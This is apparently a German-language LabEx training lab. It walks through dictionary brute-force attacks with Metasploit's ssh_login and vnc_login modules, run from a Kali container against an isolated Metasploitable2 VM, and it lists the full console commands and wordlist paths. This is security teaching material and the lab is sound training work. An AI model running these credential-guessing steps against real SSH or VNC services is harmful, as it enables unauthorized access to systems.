Einführung
In diesem Lab lernen Sie, wie Sie Brute-Force-Angriffe gegen schwache Passwort-Authentifizierungsdienste durchführen können. Wenn ein Netzwerkdienst zur Zugangsberechtigung eine Authentifizierung erfordert und das Authentifizierungsverfahren auf Benutzernamen und Passwörtern basiert, können Schwachstellen bei der Passwortwahl zu einem häufigen Angriffsziel werden. Solche Schwachstellen entstehen in der Regel, wenn Benutzer schwache Passwörter wie "123456" festlegen.
Der einfachste Weg, um Schwachstellen bei der Passwortwahl auszunutzen, ist ein Brute-Force-Angriff mit einem Wörterbuch. Die Wörterbuchdatei, die potenzielle Benutzernamen und Passwörter enthält, ist für diesen Angriff von entscheidender Bedeutung. Der Angreifer versucht, sich mit den Benutzername-Passwort-Kombinationen aus dem Wörterbuch zu verbinden, bis eine erfolgreiche Verbindung hergestellt wird.
In diesem Lab nutzen Sie das Metasploit Framework (MSF)-Terminal in der Kali Linux-Umgebung auf der LabEx-Plattform, um Brute-Force-Angriffe gegen die SSH- und VNC-Dienste auf der Metasploitable2-Zielmaschine durchzuführen.
Hinweis: Aufgrund von Kostenbeschränkungen ist die Anzahl der verfügbaren Cloud-Instanzen in diesem Lab begrenzt. Stellen Sie sicher, dass Sie die Lab-Umgebung erst starten, wenn Sie genügend Zeit haben, die Übungen abzuschließen, um eine Verschwendung von Instanzen zu vermeiden.
Den Umfang verstehen
In diesem Schritt lernen Sie die Lab-Umgebung und die Voraussetzungen für die Durchführung von Brute-Force-Angriffen kennen.
Die Lab-Umgebung besteht aus zwei Komponenten:
- Angriffsmachine: Ein Kali Linux-Container, der mit dem
docker-Befehl gestartet und über diebash-Shell zugegriffen werden muss. - Zielmaschine: Eine Metasploitable2-Virtuelle Maschine mit dem Hostnamen
targetund der IP-Adresse192.168.122.102. Das Standard-Benutzername-Passwort-Paar für diese Maschine lautetmsfadmin/msfadmin. Diese Maschine muss mit dem Libvirt-Virtuellen Maschinen-Management-System gestartet werden.
Die Angriffe werden von der Kali Linux-Umgebung aus mithilfe des Metasploit Frameworks (MSF) gegen die Zielmaschine durchgeführt.
Um die Lab-Umgebung zu starten, befolgen Sie diese Schritte:
Starten Sie einen XFCE-Terminal auf der LabEx-Hostmaschine (Ubuntu-Desktop).
Starten Sie die Metasploitable2-Zielmaschine mit dem folgenden Befehl:
sudo virsh start Metasploitable2
Warten Sie, bis die Zielmaschine gestartet ist. Dies kann 1 - 3 Minuten dauern.
- Testen Sie die Konnektivität zur Zielmaschine mit dem
ping-Befehl (Sie könnenCtrl+Cverwenden, um den Ping zu stoppen):
ping 192.168.122.102
- Starten Sie den Kali Linux-Container und greifen Sie auf die
bash-Shell zu, indem Sie den folgenden Befehl ausführen:
docker run -ti --network host b5b709a49cd5 bash
- Testen Sie die Netzwerkverbindung vom Kali-Container zur Zielmaschine mit dem
ping-Befehl (Sie könnenCtrl+Cverwenden, um den Ping zu stoppen):
ping 192.168.122.102
Nun laufen sowohl die Angriffsmachine (Kali-Container) als auch die Zielmaschine (Metasploitable2), und Sie können mit den Brute-Force-Angriffen fortfahren.
Hinweis: Wenn Sie versehentlich die bash-Shell verlassen, wird der Kali-Container gestoppt. Sie können einen neuen Kali-Container starten und erneut in die bash-Shell eintreten, indem Sie den Befehl docker run -ti --network host b5b709a49cd5 bash auf der LabEx-Hostmaschine ausführen.
Brute-Force-Angriff auf SSH
In diesem Schritt lernen Sie, wie Sie einen Brute-Force-Angriff gegen den SSH-Dienst auf der Metasploitable2-Zielmaschine mithilfe des Metasploit Frameworks (MSF) in der Kali Linux-Umgebung durchführen können.
- Starten Sie auf dem Kali Linux-Container die Metasploit-Konsole:
cd ~
msfconsole
- Verwenden Sie in der Metasploit-Konsole das Modul
auxiliary/scanner/ssh/ssh_loginfür den SSH-Brute-Force-Angriff:
use auxiliary/scanner/ssh/ssh_login
- Konfigurieren Sie die erforderlichen Optionen für den Angriff:
- Legen Sie den Zielhost fest:
set rhosts 192.168.122.102
- Legen Sie die Passwort-Wörterbuchdatei fest (Sie können die bereitgestellte Datei
/usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txtverwenden):
set userpass_file /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt
- Setzen Sie die Ausführlichkeit (
verbose) auffalse, um übermäßige Ausgabe zu vermeiden:
set verbose false
- Überprüfen Sie die konfigurierten Optionen:
show options
- Starten Sie den Brute-Force-Angriff:
exploit
Der Angriff beginnt und versucht, sich mit den Benutzername-Passwort-Kombinationen aus der angegebenen Wörterbuchdatei beim SSH-Dienst anzumelden. Sobald eine erfolgreiche Anmeldung gefunden wird, werden die entsprechenden Zugangsdaten angezeigt.
Hinweis: Der Brute-Force-Prozess kann lange dauern. Wenn gewünscht, können Sie den Prozess nach der Anzeige der ersten erfolgreichen Anmeldung durch Drücken von Ctrl+C unterbrechen.
Nachdem eine erfolgreiche Anmeldung gefunden wurde, erstellt das Angriffsskript automatisch eine SSH-Sitzung. Sie können zur Sitzung wechseln, indem Sie den Befehl
sessions -i <session_id>verwenden, wobei<session_id>die in der Ausgabe angezeigte Sitzungs-ID ist.In der SSH-Sitzung können Sie verschiedene Befehle auf der Zielmaschine ausführen.
Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung.
Brute-Force-Angriff auf VNC
In diesem Schritt lernen Sie, wie Sie einen Brute-Force-Angriff gegen den VNC-Dienst auf der Metasploitable2-Zielmaschine mithilfe des Metasploit Frameworks (MSF) in der Kali Linux-Umgebung durchführen können.
- Wenn Sie nicht bereits in der Metasploit-Konsole sind, starten Sie zunächst die Metasploit-Konsole:
cd ~
msfconsole
- Verwenden Sie in der Metasploit-Konsole das Modul
auxiliary/scanner/vnc/vnc_loginfür den VNC-Brute-Force-Angriff:
use auxiliary/scanner/vnc/vnc_login
- Konfigurieren Sie die Anzahl der Threads für den Angriff (mehr Threads beschleunigen den Angriff, erhöhen aber auch die Wahrscheinlichkeit der Entdeckung):
set THREADS 5
- Legen Sie die IP-Adresse des Zielhosts fest:
set RHOSTS 192.168.122.102
- Starten Sie den Brute-Force-Angriff:
exploit
- Die Angriffsergebnisse werden schnell angezeigt, da die VNC-Anmeldung kein Benutzernamen erfordert und nur auf häufige schwache Passwörter getestet wird.
Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung.
Zusammenfassung
In diesem Lab haben Sie gelernt, wie Sie Brute-Force-Angriffe gegen schwache Passwort-Authentifizierungsdienste mithilfe des Metasploit Frameworks (MSF) in der Kali Linux-Umgebung durchführen können. Insbesondere haben Sie Brute-Force-Angriffe gegen die SSH- und VNC-Dienste auf der Metasploitable2-Zielmaschine durchgeführt.
Das Lab hat die folgenden Schlüsselkonzepte behandelt:
- Das Verständnis der Lab-Umgebung und der Voraussetzungen
- Die Konfiguration des Metasploit Frameworks für Brute-Force-Angriffe
- Die Nutzung von Passwort-Wörterbuchdateien für Brute-Force-Angriffe
- Die Durchführung von Brute-Force-Angriffen gegen den SSH-Dienst
- Die Analyse des SSH-Brute-Force-Angriffsskripts
- Die Durchführung von Brute-Force-Angriffen gegen den VNC-Dienst
Durch diese praktische Erfahrung haben Sie praktisches Wissen und Fähigkeiten in der Durchführung von Brute-Force-Angriffen gegen schwache Passwort-Authentifizierungsdienste erworben, was ein entscheidender Aspekt des Penetrationstests und des ethischen Hackens ist.



